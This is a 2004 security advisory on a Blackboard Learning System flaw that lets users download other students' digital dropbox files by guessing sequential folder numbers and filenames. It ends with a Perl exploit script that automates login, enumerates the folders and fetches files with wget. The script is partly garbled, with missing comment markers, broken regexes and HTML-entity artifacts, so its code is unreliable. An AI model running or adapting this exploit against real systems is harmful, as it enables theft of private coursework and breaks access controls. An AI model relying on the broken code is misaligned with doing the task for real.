Advisory:

Blackboard Learning System - Stealing documents out of the digital dropbox

Blackboard

The Blackboard Learning System is a Web-based server software platform that offers course management.
More information can be found on: http://www.blackboard.com/

Affected Systems

Blackboard Learning System - Basic Edition™ (Release 6)

This is the only version on which i was able to test the bug.
Probably more versions are affected.

Overview

A bug in blackboard allows users to steal documents out of the digital dropbox of other users.

Details

Each course has it's own digital dropbox.

it can be found for example in:
http://blackboard.nosite.org/courses/1/my_course/uploads/

The digital dropbox is a function in the blackboard system.
It can be found under a course/tools/digital dropbox
This function allows blackboard users to submit files to the course administrators.

When submitting a file into the digital dropbox, the users have 2 options:
-Add File: put's the file into the digital dropbox but doesn't sends it to the course administrators
-Submit File: put's a file into the digital dropbox and send it to the course administrators

(Sending the file wil probably send a notification that a file is dropped)

If a file is submitted it wil be dropped in a folder like this:
http://blackboard.nosite.org/courses/1/my_course/uploads//_19064_1/testfile.txt

For each file that is dropped, a new folder is created:
_19064_1

The number 19064 in this folder is an autonumber.
We can easily find the current number by just adding a file to the digital drop box.
This file won't be send to the course administrators.
Files in the folder don't have a form of security.
But we are unable to see which file is in the folder.

But since the software is created for educational purpose, filenames can be guessed easy.
Since schools often have rules for naming a file.

So if we change the URL, it is possible to get files out of other people's digital dropbox:
http://blackboard.nosite.org/courses/1/my_course/uploads//_19063_1/file_i_want.txt
http://blackboard.nosite.org/courses/1/my_course/uploads//_19062_1/file_i_want.txt
http://blackboard.nosite.org/courses/1/my_course/uploads//_19061_1/file_i_want.txt
…

By doing this we have a good chance to find files that we want.

---

                     killer
                   06/05/2004       
          system_error_at_pandora.be                
        http://www.mostly-harmless.nl/

---

Exploit Code:

#!/usr/bin/perl

use strict;
use LWP;
use URI;
use Digest::Perl::MD5 'md5_hex';
use MIME::Base64;

#################################################################

fill in these 3 variables to your situation

#################################################################

my $url_to_bb = "http://blackboard.example.org/";
my $user = 'username';
my $password = 'password';
my $encryption = 'md5'; # this may also be base64

#################################################################

The code for the logging in onto blackboard.

I thank vandreadfull for providing me with this code

#################################################################

my @headers = ('User-Agent' => 'SQL Injection Tester/1.1b (M & H)',
'Accept-Language' => 'en-US',
'Accept-Charset' => 'iso-8859-1,,utf-8',
'Accept-Encoding' => '',
'Accept' => '/*'
);
my $browser = LWP::UserAgent->new(keep_alive => 1);
$browser->cookie_jar({});

print "logging in\n";

my $url = $url_to_bb;
print '.';
$_ = ($browser->get($url, @headers))->content;
#one more time, for some reason (probably a session or something) blackboard doesnt provide us with the
one_time_token the first time
$_ = ($browser->get($url."webapps/login", @headers))->content;
my $string = $_;

Process page to fetch hidden HTML form variables

my %postvars;
$postvars{login} = 'Log In';
$postvars{password} = '';
while ($string =~ m{INPUT VALUE="(.?)" NAME="(.?)" TYPE="hidden"}g) {
if ($2 ne 'password') {
$postvars{$2} = $1;
}
}

Set the username

$postvars{user_id} = $user;

Setting the password (md5 or base64)

if ($encryption eq 'md5') {
$_ = $string;
/<INPUT VALUE=\"([^"]*)\" NAME=\"one\_time\_token\"/;
my $one_time_token = $1;
$password = md5_hex($password);
$password =~y/a-z/A-Z/;
$password = md5_hex("$password$one_time_token");
$password =~y/a-z/A-Z/;
$postvars{encoded_pw} = $password;
}
if ($encryption eq 'base64') {
$postvars{encoded_pw} = encode_base64($password);
}

Post login

$url = $url_to_bb."webapps/login";
print '.';
my $response = $browser->post($url, [%postvars], @headers);

Do another refresh

$_ = $response->content;
$_ =~ m{document\.location\.replace\(\'(.*?)\'\)} || exit 1;
$url = $url_to_bb . $1;
print '.';
$browser->get($url, @headers)->content;

print "logged in\n";

#################################################################

Fill in these 3 variables according to your needs

#################################################################

my $path="http://blackboard.example.org/courses/1/my_course/uploads//_19063_1/&quot;;
my @file=("test.txt","doc2.txt");
my $loop=10;

#################################################################

The code for exploiting the vulnerability

#################################################################

my $file;
my $wget;

$=reverse($path);
/(.*?)_/;
my $autocount=reverse($1);

my $orig_count=$autocount;

$wget="wget -q ";
for(my $t=0;$t<$loop;$t++) {
$autocount–;
$url=$path;
$url=~ s/$orig_count/$autocount/;
foreach $file (@file) {
system("$wget$url$file");
}
}
print("\nDone, if the files existed they should be in this directory.\n\nkiller
2004\nhttp://www.mostly-harmless.nl/");

Kind regards

killer
http://www.mostly-harmless.nl